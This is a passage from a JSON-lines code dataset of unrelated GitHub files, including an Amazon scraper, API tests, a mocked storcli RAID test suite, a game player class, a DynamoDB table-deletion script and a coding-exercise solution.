\"https://www.amazon.in/s?k=bags&crid=2M096C61O4MLT&qid=1653308124&sprefix=ba%2Caps%2C283&ref=sr_pg_\"\r\ntotal_pages = 20\r\nall_products = []\r\n\r\nfor page in range(1, total_pages + 1):\r\n url = base_url + str(page)\r\n print(f\"Fetching URL: {url}\")\r\n products_on_page = scrape_products(url)\r\n if products_on_page:\r\n all_products.extend(products_on_page)\r\n # time.sleep(3) # Add a delay of 3 seconds between each page request\r\n\r\n\r\ndf = pd.DataFrame(all_products)\r\ndf.to_csv(r\"amazon_scrape.csv\", index=False)\r\n","repo_name":"NaeemNiyas/web_scraping","sub_path":"WebScraping_Part1.py","file_name":"WebScraping_Part1.py","file_ext":"py","file_size_in_byte":2039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8706288385","text":"from httpx import AsyncClient\n\n\"\"\"\nТестируем API по работе с историями пользователя\n\"\"\"\n\n\nasync def test_add_hisory_user_success(ac: AsyncClient):\n response = await ac.post(\"/visited_links\", json={\n \"links\": [\n \"yandex.ru\",\n \"yandex.ru/web\",\n \"yandex.ru\",\n \"sberbank.ru\",\n ]\n })\n\n assert response.status_code == 200\n\nasync def test_add_user_history_empty_list(ac: AsyncClient):\n # Создаем тестовые данные с пустым списком ссылок\n data = {\n \"links\": []\n }\n\n # Отправляем POST-запрос\n response = await ac.post(\"/visited_links\", json=data)\n\n # Проверяем статус код и ожидаемый результат\n assert response.status_code == 400\n assert response.json() == {\"detail\": \"Пустой список\"}\n\n\nasync def test_add_user_history_number_list(ac: AsyncClient):\n # Создаем тестовые данные с пустым списком ссылок\n data = {\n \"links\": [123, True, 7.0, (1, 2, 3)]\n }\n\n # Отправляем POST-запрос\n response = await ac.post(\"/visited_links\", json=data)\n\n # Проверяем статус код и ожидаемый результат\n assert response.status_code == 400\n assert response.json() == {\"detail\": \"Некорректный формат данных. Ожидается список строк.\"}\n\n\nasync def test_add_user_history_invalid_data(ac: AsyncClient):\n # Создаем тестовые данные с неверным форматом\n data = {\n \"links\": \"https://example.com\"\n }\n\n # Отправляем POST-запрос\n response = await ac.post(\"/visited_links\", json=data)\n\n # Проверяем статус код и ожидаемый результат\n assert response.status_code == 422\n","repo_name":"MRNurutdinov/test_ops","sub_path":"tests/test_api_client_history.py","file_name":"test_api_client_history.py","file_ext":"py","file_size_in_byte":1952,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9531190272","text":"import json\nimport mock\nimport unittest\n\nfrom tests_helpers import MultiReturnValues, add_top_srcdir_to_path,\\\n read_expected\n\n\nadd_top_srcdir_to_path()\n\nimport storrest\nfrom storrest.storutils import strlst, vd_raid_type\n\nSTORCLI_SHOW = read_expected('call_show.json')\nSTORCLI_SHOW_ALL = read_expected('call_show_all.json')\nSTORCLI_ENCLOSURES_SHOW = read_expected('c0_eall_show.json')\nSTORCLI_C0_EALL_SALL_SHOW = read_expected('c0_eall_sall_show_all.json')\nSTORCLI_C1_SALL_SHOW = read_expected('c1_sall_show_all.json')\n\n\ndef extract_controller_raw_data(raw_dat, controller_id, serialize=True):\n def _controller_match(ctrl):\n return ctrl['Command Status']['Controller'] == controller_id\n\n dat = json.loads(raw_dat)\n subdat = [ctrl for ctrl in dat['Controllers'] if _controller_match(ctrl)]\n ret = {'Controllers': subdat}\n return json.dumps(ret) if serialize else ret\n\n\nclass StorcliTest(unittest.TestCase):\n def setUp(self):\n super(StorcliTest, self).setUp()\n self.maxDiff = None\n self.patcher = mock.patch('storrest.storcli.subprocess.check_output')\n self.mock_check_output = self.patcher.start()\n self.mock_check_output.return_value = STORCLI_SHOW_ALL\n self.storcli = storrest.storcli.Storcli()\n self._expected_virtual_drives = None\n self._expected_physical_drives = None\n self._controller_details = None\n self.controllers = [{'controller_id': 0,\n 'pci_address': '00:06:00:00',\n 'model': 'Nytro MegaRAID8100-4i',\n 'serial_number': '',\n 'enclosures': [62, 252],\n 'host_interface': 'PCIE',\n 'sas_address': '5000000012345678',\n 'capabilities': {'max_cachecade_size': 1024, },\n 'health': None,\n },\n {'controller_id': 1,\n 'pci_address': None,\n 'model': \"Nytro WarpDrive XP6210-4A2048\",\n 'serial_number': '123456789',\n 'host_interface': 'PCIE',\n 'sas_address': ' 500605b012061206',\n 'enclosures': [],\n 'capabilities': {'max_cachecade_size': 0, },\n 'health': {\n 'temperature': ' 72 (degree C)',\n 'warranty_remaining': ' 100 (percent)',\n 'overall_health': 'GOOD',\n },\n }]\n self.controllers = sorted(self.controllers)\n\n def tearDown(self):\n super(StorcliTest, self).tearDown()\n self.patcher.stop()\n\n @property\n def expected_physical_drives(self):\n if self._expected_physical_drives:\n return self._expected_physical_drives\n else:\n physical_drives = read_expected('pdrives.json', raw=False)\n self._expected_physical_drives = sorted(physical_drives)\n return self._expected_physical_drives\n\n @property\n def expected_virtual_drives(self):\n if self._expected_virtual_drives:\n return self._expected_virtual_drives\n else:\n vds = read_expected('vdrives_skel.json', raw=False)\n for vd in vds:\n drive_group = vd['drive_group']\n controller_id = vd['controller_id']\n pdrives = sorted([d for d in self.expected_physical_drives\n if d['controller_id'] == controller_id\n and d['drive_group'] == drive_group])\n vd['physical_drives'] = pdrives\n self._expected_virtual_drives = sorted(vds)\n return self._expected_virtual_drives\n\n def test_physical_drives(self):\n self.mock_check_output.side_effect = MultiReturnValues([\n STORCLI_SHOW,\n STORCLI_C0_EALL_SALL_SHOW,\n STORCLI_C1_SALL_SHOW\n ])\n actual = sorted(self.storcli.all_physical_drives)\n expected_commands = (\n '{storcli_cmd} /call show J',\n '{storcli_cmd} /c0/eall/sall show all J',\n '{storcli_cmd} /c1/sall show all J',\n )\n self.verify_storcli_commands(expected_commands)\n self.assertEqual(actual, self.expected_physical_drives)\n\n def test_virtual_drives(self):\n self.mock_check_output.side_effect = MultiReturnValues([\n STORCLI_SHOW,\n STORCLI_C0_EALL_SALL_SHOW,\n STORCLI_C1_SALL_SHOW\n ])\n actual = sorted(self.storcli.all_virtual_drives)\n expected_commands = (\n '{storcli_cmd} /call show J',\n '{storcli_cmd} /c0/eall/sall show all J',\n '{storcli_cmd} /c1/sall show all J',\n )\n self.verify_storcli_commands(expected_commands)\n self.assertEqual(actual, self.expected_virtual_drives)\n\n def _get_nytrocache(self, raid_type='nytrocache'):\n self.mock_check_output.side_effect = MultiReturnValues([\n STORCLI_SHOW,\n STORCLI_C0_EALL_SALL_SHOW,\n STORCLI_C1_SALL_SHOW\n ])\n expected_commands = (\n '{storcli_cmd} /call show J',\n '{storcli_cmd} /c0/eall/sall show all J',\n '{storcli_cmd} /c1/sall show all J',\n )\n actual = sorted(self.storcli.virtual_drives(raid_type=raid_type))\n self.verify_storcli_commands(expected_commands)\n expected = sorted([vd for vd in self.expected_virtual_drives\n if vd_raid_type(vd) == raid_type])\n self.assertEqual(actual, expected)\n\n def test_get_nytrocache(self):\n self._get_nytrocache(raid_type='nytrocache')\n\n def test_get_cachecade(self):\n self._get_nytrocache(raid_type='cachecade')\n\n def test_controllers(self):\n self.mock_check_output.side_effect = MultiReturnValues([\n STORCLI_SHOW_ALL,\n STORCLI_ENCLOSURES_SHOW,\n read_expected('c0_show_health.json'),\n read_expected('c1_show_health.json')\n ])\n actual = self.storcli.controllers\n self.assertEqual(actual, self.controllers)\n expected_commands = (\n '{storcli_cmd} /call show all J',\n # controller 1 is NytroWarpDrive and has no enclosures\n '{storcli_cmd} /c0/eall show J',\n '{storcli_cmd} /c0 show health J',\n '{storcli_cmd} /c1 show health J',\n )\n self.verify_storcli_commands(expected_commands)\n\n @property\n def controller_details(self):\n if self._controller_details is not None:\n return self._controller_details\n for cobj in self.controllers:\n cobj['physical_drives'] = \\\n sorted([d for d in self.expected_physical_drives\n if d['controller_id'] == cobj['controller_id']])\n cobj['virtual_drives'] = \\\n sorted([vd for vd in self.expected_virtual_drives\n if vd['controller_id'] == cobj['controller_id']])\n self._controller_details = self.controllers\n return self._controller_details\n\n def _test_controller_details(self, capabilities=True,\n controller_health_works=False):\n controller_id = 0\n controller_dat = extract_controller_raw_data(STORCLI_SHOW_ALL,\n controller_id,\n serialize=False)\n if not capabilities:\n del controller_dat['Controllers'][0][\n 'Response Data']['Capabilities']\n\n controller_health = read_expected(\n 'c{0}_show_health.json'.format(controller_id), raw=False)\n if controller_health_works:\n status_obj = controller_health['Controllers'][0]['Command Status']\n del status_obj['ErrCd']\n status_obj['Status'] = 'Success'\n expected_controller = [c for c in self.controllers\n if c['controller_id'] == controller_id][0]\n expected_controller['health'] = {\n 'temperature': '74',\n 'overall_health': 'GOOD',\n 'warranty_remaining': '100',\n }\n\n self.mock_check_output.side_effect = MultiReturnValues([\n json.dumps(controller_dat),\n STORCLI_ENCLOSURES_SHOW,\n json.dumps(controller_health),\n STORCLI_C0_EALL_SALL_SHOW,\n ])\n expected = [c for c in self.controller_details\n if c['controller_id'] == controller_id][0]\n if not capabilities:\n expected['capabilities']['max_cachecade_size'] = 0\n\n actual = self.storcli.controller_details(controller_id=controller_id)\n actual['physical_drives'] = sorted(actual['physical_drives'])\n actual['virtual_drives'] = sorted(actual['virtual_drives'])\n self.assertEqual(actual, expected)\n expected_commands = (\n '{storcli_cmd} /c{controller_id} show all J',\n '{storcli_cmd} /c{controller_id}/eall show J',\n '{storcli_cmd} /c{controller_id} show health J',\n '{storcli_cmd} /c{controller_id}/eall/sall show all J',\n )\n self.verify_storcli_commands(expected_commands,\n controller_id=controller_id)\n\n def test_controller_details(self):\n self._test_controller_details()\n\n def test_controller_details_nocaps(self):\n self._test_controller_details(capabilities=False)\n\n def test_controller_details_health(self):\n self._test_controller_details(controller_health_works=True)\n\n def test_controller_details_all(self):\n controller_id = None\n self.mock_check_output.side_effect = MultiReturnValues([\n STORCLI_SHOW_ALL,\n STORCLI_ENCLOSURES_SHOW,\n read_expected('c0_show_health.json'),\n STORCLI_C0_EALL_SALL_SHOW,\n read_expected('c1_show_health.json'),\n STORCLI_C1_SALL_SHOW,\n ])\n expected_commands = (\n '{storcli_cmd} /call show all J',\n '{storcli_cmd} /c0/eall show J',\n '{storcli_cmd} /c0 show health J',\n '{storcli_cmd} /c0/eall/sall show all J',\n '{storcli_cmd} /c1 show health J',\n '{storcli_cmd} /c1/sall show all J',\n )\n actual = self.storcli.controller_details(controller_id)\n self.verify_storcli_commands(expected_commands)\n self.assertEqual(actual, self.controller_details)\n\n def test_virtual_drive_details(self):\n controller_id = 0\n virtual_drive_id = 0\n self.mock_check_output.side_effect = MultiReturnValues([\n extract_controller_raw_data(STORCLI_SHOW_ALL, controller_id),\n STORCLI_C0_EALL_SALL_SHOW\n ])\n actual = self.storcli.virtual_drive_details(controller_id,\n virtual_drive_id)\n expected = [vd for vd in self.expected_virtual_drives\n if vd['controller_id'] == controller_id and\n vd['virtual_drive'] == virtual_drive_id][0]\n expected_commands = (\n '{storcli_cmd} /c{controller_id} show J',\n '{storcli_cmd} /c{controller_id}/eall/sall show all J',\n )\n self.assertEqual(actual, expected)\n self.verify_storcli_commands(expected_commands,\n controller_id=controller_id)\n\n def test_virtual_drive_details_nonexistent(self):\n self.mock_check_output.return_value = STORCLI_SHOW\n controller_id = 0\n virtual_drive_id = 100500\n with self.assertRaises(storrest.storcli.StorcliError):\n self.storcli.virtual_drive_details(controller_id,\n virtual_drive_id)\n expected_commands = (\n '{storcli_cmd} /c{controller_id} show J',\n '{storcli_cmd} /c0/eall/sall show all J',\n '{storcli_cmd} /c1/sall show all J',\n )\n self.verify_storcli_commands(expected_commands,\n controller_id=controller_id)\n\n def verify_storcli_commands(self, expected_commands, **kwargs):\n kwargs['storcli_cmd'] = ' '.join(self.storcli.storcli_cmd)\n expected_calls = [((cmd.format(**kwargs).split(), ), {})\n for cmd in expected_commands]\n actual_calls = self.mock_check_output.call_args_list\n self.assertEqual(actual_calls, expected_calls)\n\n def _make_success_reply(self, controller_id, serialize=True):\n return self._make_reply(controller_id, serialize=serialize)\n\n def _make_reply(self, controller_id, error_code=None, serialize=True):\n data = {\n 'Controllers': [\n {\n 'Command Status': {\n 'Controller': controller_id,\n 'Status': 'Success' if not error_code else 'Failed',\n 'Description': 'None',\n },\n },\n ]}\n\n if error_code:\n data['Controllers'][0]['Command Status']['ErrCd'] = error_code\n\n return json.dumps(data) if serialize else data\n\n def _mock_success_reply(self, controller_id):\n self.mock_check_output.return_value = \\\n self._make_success_reply(controller_id)\n\n def test_create_warp_drive_vd_dflt(self):\n controller_id = 0\n self._mock_success_reply(controller_id)\n self.storcli.create_warp_drive_vd(controller_id)\n expected_commands = (\n '{storcli_cmd} /c{controller_id}/eall/sall start format J',\n )\n self.verify_storcli_commands(expected_commands,\n controller_id=controller_id)\n\n def _create_warp_drive_vd_overprovision(self, overprovision):\n controller_id = 0\n self._mock_success_reply(controller_id)\n self.storcli.create_warp_drive_vd(controller_id,\n overprovision=overprovision)\n\n overprovision_level = 'overprovision level'\n try:\n testval = int(overprovision)\n overprovision_level = 'overprovision'\n except:\n pass\n\n expected_commands = (\n '{storcli_cmd} /c{controller_id}/eall/sall start format '\n '{overprovision_level}={overprovision} J',\n\n )\n self.verify_storcli_commands(expected_commands,\n controller_id=controller_id,\n overprovision_level=overprovision_level,\n overprovision=overprovision)\n\n def test_create_warp_drive_vd_cap(self):\n self._create_warp_drive_vd_overprovision('cap')\n\n def test_create_warp_drive_vd_perf(self):\n self._create_warp_drive_vd_overprovision('perf')\n\n def test_create_warp_drive_vd_percentage(self):\n self._create_warp_drive_vd_overprovision(50)\n\n def _create_raid(self,\n raid_type=None,\n raid_level=1):\n # XXX: these values must correspond the controllers state in\n # call_show_all.json (i.e. drives on specified controller, enclosure\n # and slots are part of RAID1 array)\n controller_id = 0\n if raid_type is None:\n enclosure = 62\n slots = (0, 1)\n elif raid_type == 'nytrocache':\n enclosure = '252'\n slots = ('4', 6)\n\n physical_drives = [{\n 'controller_id': controller_id,\n 'enclosure': enclosure,\n 'slot': slot\n } for slot in slots]\n pd_per_array = ''\n if raid_level in ('10', 10):\n pd_per_array = 2\n if pd_per_array:\n pd_per_array = 'PDperArray={0}'.format(pd_per_array)\n\n ssd_caching = raid_type is None\n io_policy = 'direct'\n\n self.mock_check_output.side_effect = MultiReturnValues([\n self._make_success_reply(controller_id),\n extract_controller_raw_data(STORCLI_SHOW, controller_id),\n STORCLI_C0_EALL_SALL_SHOW\n ])\n\n self.storcli.create_virtual_drive(physical_drives,\n raid_level=raid_level,\n raid_type=raid_type,\n io_policy=io_policy,\n ssd_caching=ssd_caching)\n expected_commands = (\n '{storcli_cmd} /c{controller_id} add vd {raid_type} '\n 'r{raid_level} drives={drives_str} '\n '{pd_per_array} {io_policy} {ssd_caching} J',\n '{storcli_cmd} /c{controller_id} show J',\n '{storcli_cmd} /c{controller_id}/eall/sall show all J',\n )\n drives_str = '{enclosure}:{slots}'.format(enclosure=enclosure,\n slots=strlst(slots))\n params = {\n 'controller_id': controller_id,\n 'raid_type': raid_type or '',\n 'raid_level': raid_level,\n 'drives_str': drives_str,\n 'io_policy': io_policy,\n 'ssd_caching': 'cachevd' if ssd_caching else '',\n 'pd_per_array': pd_per_array,\n }\n self.verify_storcli_commands(expected_commands, **params)\n\n def test_create_raid1(self):\n self._create_raid()\n\n def test_create_nytrocache(self):\n self._create_raid(raid_type='nytrocache')\n\n def test_create_raid10(self):\n self._create_raid(raid_level=10)\n\n def _create_raid_negative(self, valid_reply=True):\n raid_level = 1\n controller_id = 0\n enclosure = 62\n slots = (0, 1)\n physical_drives = [{\n 'controller_id': controller_id,\n 'enclosure': enclosure,\n 'slot': slot\n } for slot in slots]\n self.mock_check_output.return_value = \\\n self._make_reply(controller_id, error_code=42) \\\n if valid_reply else 'choke; JSON! parser'\n expected_commands = (\n '{storcli_cmd} /c{controller_id} add vd '\n 'r{raid_level} drives={enclosure}:{slots_str} J',\n )\n with self.assertRaises(storrest.storcli.StorcliError) as cm:\n self.storcli.create_virtual_drive(physical_drives,\n raid_level=raid_level)\n the_exception = cm.exception\n if not valid_reply:\n self.assertEqual(the_exception.error_code,\n storrest.storcli.INVALID_NYTROCLI_JSON)\n self.verify_storcli_commands(expected_commands,\n controller_id=controller_id,\n enclosure=enclosure,\n slots_str=strlst(slots),\n raid_level=raid_level)\n\n def test_create_virtual_drive_negative(self):\n self._create_raid_negative()\n\n def test_create_virtual_drive_invalid_reply(self):\n self._create_raid_negative(valid_reply=False)\n\n def test_create_virtual_drive_enclosure_missing(self):\n raid_level = 1\n controller_id = 0\n slots = (0, 1)\n physical_drives = [{\n 'controller_id': controller_id,\n # no enclosure here, this is intensional\n 'slot': slot\n } for slot in slots]\n with self.assertRaises(storrest.storcli.StorcliError):\n self.storcli.create_virtual_drive(physical_drives,\n raid_level=raid_level)\n self.verify_storcli_commands([])\n\n def test_delete_virtual_drive(self):\n controller_id = 0\n virtual_drive_id = 1\n force = True\n self._mock_success_reply(controller_id)\n expected_commands = (\n '{storcli_cmd} /c{controller_id}/v{virtual_drive_id} del {force} J',\n )\n self.storcli.delete_virtual_drive(controller_id,\n virtual_drive_id,\n force=force)\n self.verify_storcli_commands(expected_commands,\n controller_id=controller_id,\n virtual_drive_id=virtual_drive_id,\n force='force' if force else '')\n\n def _delete_all(self, controller_id=None, is_warpdrive=False):\n self.mock_check_output.side_effect = MultiReturnValues([\n STORCLI_SHOW_ALL,\n self._make_success_reply(controller_id)\n ])\n vdrives_id = '0' if is_warpdrive else 'all'\n expected_commands = (\n '{storcli_cmd} /c{controller_id} show all J',\n '{storcli_cmd} /c{controller_id}/v%s del J' % vdrives_id,\n )\n self.storcli.delete_virtual_drive(controller_id, 'all')\n self.verify_storcli_commands(expected_commands,\n controller_id=controller_id)\n\n def test_delete_warpdrive(self):\n self._delete_all(controller_id=1, is_warpdrive=True)\n\n def test_delete_all_virtual_drives(self):\n self._delete_all(controller_id=0, is_warpdrive=False)\n\n def test_global_hotspare_create(self):\n params = {\n 'controller_id': 0,\n 'enclosure': 62,\n 'slot': 19\n }\n self._mock_success_reply(params['controller_id'])\n self.storcli.add_hotspare_drive(None, **params)\n expected_commands = (\n '{storcli_cmd} /c{controller_id}/e{enclosure}/s{slot} '\n 'add hotsparedrive J',\n )\n self.verify_storcli_commands(expected_commands, **params)\n\n def test_global_hotspare_create_pdrive(self):\n pdrive = {\n 'controller_id': 0,\n 'enclosure': 62,\n 'slot': 19\n }\n self._mock_success_reply(pdrive['controller_id'])\n expected_commands = (\n '{storcli_cmd} /c{controller_id}/e{enclosure}/s{slot} '\n 'add hotsparedrive J',\n )\n self.storcli.add_hotspare_drive(None, pdrive=pdrive)\n self.verify_storcli_commands(expected_commands, **pdrive)\n\n def test_add_dedicated_hotspare(self):\n params = {\n 'controller_id': 0,\n 'enclosure': 62,\n 'slot': 19,\n }\n target_vd = [vd for vd in self.expected_virtual_drives\n if vd['controller_id'] == params['controller_id'] and\n not vd['raid_level'].startswith('Nytro')][0]\n vdrives = [target_vd['virtual_drive']]\n\n self.mock_check_output.side_effect = MultiReturnValues([\n extract_controller_raw_data(STORCLI_SHOW,\n controller_id=params['controller_id']),\n STORCLI_C0_EALL_SALL_SHOW,\n self._make_success_reply(params['controller_id'])\n ])\n self.storcli.add_hotspare_drive(vdrives, **params)\n expected_commands = (\n '{storcli_cmd} /c{controller_id} show J',\n '{storcli_cmd} /c{controller_id}/eall/sall show all J',\n '{storcli_cmd} /c{controller_id}/e{enclosure}/s{slot} add '\n 'hotsparedrive dgs={drive_group} J',\n )\n params['drive_group'] = target_vd['drive_group']\n self.verify_storcli_commands(expected_commands, **params)\n\n def test_hotspare_delete(self):\n params = {\n 'controller_id': 0,\n 'enclosure': 62,\n 'slot': 19\n }\n self._mock_success_reply(params['controller_id'])\n self.storcli.delete_hotspare_drive(**params)\n expected_commands = (\n '{storcli_cmd} /c{controller_id}/e{enclosure}/s{slot} '\n 'delete hotsparedrive J',\n )\n self.verify_storcli_commands(expected_commands, **params)\n\n def test_update_virtual_drive(self):\n controller_id = 0\n virtual_drive_id = 1\n self._mock_success_reply(controller_id)\n params = {\n 'name': 'FooBar',\n 'io_policy': 'direct',\n 'write_cache': 'wb',\n 'read_ahead': False,\n 'ssd_caching': True,\n }\n self.storcli.update_virtual_drive(controller_id,\n virtual_drive_id,\n **params)\n expected_commands = (\n '{storcli_cmd} /c{controller_id}/v{virtual_drive_id} set '\n 'iopolicy={io_policy} name={name} wrcache={write_cache} '\n 'rdcache={read_ahead} ssdcaching={ssd_caching} J',\n )\n params['controller_id'] = controller_id\n params['virtual_drive_id'] = virtual_drive_id\n params['ssd_caching'] = 'on' if params['ssd_caching'] else 'off'\n params['read_ahead'] = 'RA' if params['read_ahead'] else 'NoRA'\n self.verify_storcli_commands(expected_commands, **params)\n\n def test_nonexisting_command(self):\n self.mock_check_output.side_effect = \\\n OSError(2, 'no such file or directory', '/foo')\n cli = storrest.storcli.Storcli(storcli_cmd=['/foo'])\n with self.assertRaises(storrest.storcli.StorcliError):\n cli.all_virtual_drives\n\n def test_faulty_command(self):\n controller_id = 1\n returncode = 111\n error_code = 42\n command_output = self._make_reply(controller_id, error_code=error_code)\n self.mock_check_output.side_effect = \\\n storrest.storcli.subprocess.CalledProcessError(\n returncode,\n self.storcli.storcli_cmd,\n output=command_output\n )\n with self.assertRaises(storrest.storcli.StorcliError) as ee:\n self.storcli.all_virtual_drives\n the_exception = ee.exception\n self.assertEqual(the_exception.error_code, error_code)\n\n\nclass StorutilsTest(unittest.TestCase):\n def test_parse_phys_drive_state_unusual(self):\n from storrest.storutils import parse_phys_drive_state\n raw_weird_state = 'FooBar'\n processed_weird_state = parse_phys_drive_state(raw_weird_state)\n self.assertEqual(raw_weird_state.lower(), processed_weird_state)\n\n def test_size_units_conversion(self):\n from storrest.storutils import parse_drive_size\n sizes_tbl = {\n '1 Mb': 1024 * 1024,\n '10 Kb': 10 * 1024,\n '2 Tb': 2 * 1024 * 1024 * 1024 * 1024,\n }\n for str_size, size in sizes_tbl.iteritems():\n self.assertEqual(parse_drive_size(str_size), size)\n\n def test_size_units_conversion_negative(self):\n from storrest.storutils import parse_drive_size\n with self.assertRaises(ValueError):\n parse_drive_size('100500 FooBar')\n\n def test_parse_weird_virtual_drive_state(self):\n from storrest.storutils import parse_state\n raw_weird_state = 'FooBar'\n weird_state = parse_state(raw_weird_state)\n self.assertEqual(weird_state, raw_weird_state.lower())\n\n def test_vd_raid_type(self):\n from storrest.storutils import vd_raid_type\n self.assertEqual(vd_raid_type({'raid_level': 'CacheCade1'}),\n 'cachecade')\n self.assertEqual(vd_raid_type({'raid_level': 'NytroCache1'}),\n 'nytrocache')\n\n def test_parse_sector_size(self):\n from storrest.storutils import parse_sector_size\n self.assertEqual(parse_sector_size('512B'), 512)\n self.assertEqual(parse_sector_size('4Kb'), 4096)\n with self.assertRaises(ValueError):\n parse_sector_size('foo bar')\n\n def test_parse_cache_flags_negative(self):\n from storrest.storutils import parse_cache_flags\n\n with self.assertRaises(ValueError):\n parse_cache_flags('foo bar')\n\n with self.assertRaises(ValueError):\n parse_cache_flags('NRWTF')\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"Mirantis/lsi-api","sub_path":"tests/test_storcli.py","file_name":"test_storcli.py","file_ext":"py","file_size_in_byte":28137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71849230867","text":"from Unit import Unit\nfrom Tower import Tower\nfrom HQ import HQ\nfrom Constants import Constants as C\n\nclass Player:\n def __init__(self, id, units, towers, hq, population, capacity, playerMap, initialHQCoord, grids):\n self.id = id\n self.units = units # dictionary\n self.towers = towers # in most cases should be empty first\n self.hqs = hq # list of hq objects\n self.population = population\n self.capacity = capacity\n self.playerMap = playerMap\n self.isDead = False\n self.grids = grids\n self.init_hq(initialHQCoord)\n self.update_vision()\n self.unitId = C.STARTING_UNITS_COUNT\n self.points = 0\n\n\n def add_unit(self, coord):\n newId = len(self.units)\n unit = Unit(newId, self.id, coord, None)\n self.units[newId] = unit\n return newId\n\n\n def init_hq(self, initialHQCoord):\n if(len(self.hqs) != 0):\n return\n hq = HQ(self.id, self.id, initialHQCoord)\n self.hqs.append(hq)\n\n def restart_vision(self):\n self.playerMap = [[C.NOT_VISIBLE for col in range(C.COL)] for row in range(C.ROW)]\n\n def update_vision(self):\n # get coords that are visible for each hq, unit and tower\n # set each coord as visible\n self.restart_vision()\n for i in self.hqs:\n sight = self.grids.cells_within_distance(i.coord, C.HQ_SIGHT_RADIUS)\n for cell in sight:\n self.playerMap[cell[0]][cell[1]]= C.VISIBLE\n for i in self.towers:\n sight = self.grids.cells_within_distance(i.coord, C.TOWER_SIGHT_RADIUS)\n for cell in sight:\n self.playerMap[cell[0]][cell[1]]= C.VISIBLE\n for key, i in self.units.items():\n if(i.isDead):\n continue\n sight = self.grids.cells_within_distance(i.coord, C.UNIT_SIGHT_RADIUS)\n for cell in sight:\n self.playerMap[cell[0]][cell[1]]= C.VISIBLE\n\n def remove_tower(self, towerId):\n removeIndex = 0\n for i in range(len(self.towers)):\n if(self.towers[i].id == towerId):\n removeIndex = i\n break\n self.towers.pop(removeIndex)\n def update_points(self):\n self.points += len(self.hqs) * C.HQ_POINTS + len(self.towers) * C.TOWER_POINTS\n\n def issue_command(self, units, target, arena):\n for id in units:\n self.units[id].target = target\n self.units[id].path = self.grids.bfs(self.units[id].coord, target, self.id, arena)\n self.units[id].pathIndex = 0\n\n\n def kill_unit(self, unitId):\n self.units[unitId].isDead = True\n self.population -= 1\n\n def recalculate_capacity(self):\n self.capacity = len(self.hqs) * C.HQ_POPULATION + len(self.towers) * C.TOWER_POPULATION\n\n def update(self, arena):\n #TODO: Boundary Check\n self.recalculate_capacity()\n for key, unit in self.units.items():\n if(unit.target == None):\n continue\n haveToMove = True\n objectType = arena[unit.target[0]][unit.target[1]][0]\n if(self.grids.isNeighbour(unit.coord, unit.target) and \\\n (objectType == C.HQ or objectType == C.TOWER)):\n haveToMove = False\n if(haveToMove):\n direction = self.grids.get_move(unit.coord, unit.target, self.id, arena)\n newCoord = self.grids.move(unit.coord, direction)\n\n # dfs\n unit = self.units[key]\n # if(not(unit.path != None and len(unit.path) > unit.pathIndex and self.grids.is_free(unit.path[unit.pathIndex], self.id, arena))):\n if(unit.path != None and len(unit.path) > 0 and not self.grids.is_free(unit.path[unit.pathIndex], self.id, arena)):\n self.units[key].path = self.grids.dfs(unit.coord, unit.target, self.id, arena)\n self.units[key].pathIndex = 0\n if(len(unit.path) > unit.pathIndex):\n newCoord = unit.path[unit.pathIndex]\n self.units[key].pathIndex += 1\n\n if(newCoord == self.units[key].prevPos):\n self.units[key].stuckedCounter += 1\n else:\n self.units[key].stuckedCounter = 0\n if(self.units[key].stuckedCounter == C.STUCKED_TOLERANCE):\n self.units[key].target = None\n else:\n self.units[key].prevPos = self.units[key].coord\n self.units[key].coord = newCoord\n if(newCoord[0] < 0 or newCoord[0] >= C.COL or newCoord[1] < 0 or newCoord[1] >= C.ROW):\n continue\n arena[newCoord[0]][newCoord[1]] = [C.UNIT, self.id, key]\n unit.update()\n","repo_name":"cacad-ntu/hnr-server","sub_path":"Player.py","file_name":"Player.py","file_ext":"py","file_size_in_byte":4830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24022833591","text":"def solution(answers):\n grade = [0, 0, 0]\n student1 = [1, 2, 3, 4, 5]\n student2 = [2, 1, 2, 3, 2, 4, 2, 5]\n student3 = [3, 3, 1, 1, 2, 2, 4, 4, 5, 5]\n \n for i, num in enumerate(answers):\n if(student1[i % len(student1)] == num): grade[0] += 1\n if(student2[i % len(student2)] == num): grade[1] += 1\n if(student3[i % len(student3)] == num): grade[2] += 1\n \n maxNum = max(grade)\n answer = list()\n \n for i in range(3):\n if(maxNum == grade[i]):\n answer.append(i + 1)\n \n return answer\n\nprint(solution([1, 2, 3, 4, 5]))","repo_name":"hugh4652/Programmers","sub_path":"레벨 1/모의고사/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19811716740","text":"import boto3\nimport argparse\n\ndef delete_table(table_name, dyn_resource=None):\n \"\"\"\n Deletes the demonstration table.\n\n :param dyn_resource: Either a Boto3 or DAX resource.\n \"\"\"\n if dyn_resource is None:\n dyn_resource = boto3.resource('dynamodb')\n\n table = dyn_resource.Table(table_name)\n table.delete()\n\n print(f\"Deleting {table.name}...\")\n table.wait_until_not_exists()\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description = 'Delete the given DynamoDB table')\n# parser.add_argument(\"-t\", \"--table-name\", help = \"Name of table to delete\")\n parser.add_argument('table')\n args = parser.parse_args()\n\n print(args.table)\n print(\"The table to delete: \" + args.table)\n delete_table(args.table)\n print(\"Table deleted!\")","repo_name":"sguillory6/the-complete-sam-workshop-connectors","sub_path":"scripts/delete_table.py","file_name":"delete_table.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40371217127","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 14 08:50:50 2022\nChapitre 18\n@author: remimetzdorff\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\n\nn = 3\nf = .25\nfps = 30\nt = np.linspace(0,1/f, int(1/f * fps))\n\ndef B(t, phi, a=1):\n omega = 2*np.pi*f\n return a * np.cos(omega*t + phi)\n\nfig, ax = plt.subplots(1)\n\nfields = []\nfor i in range(n):\n 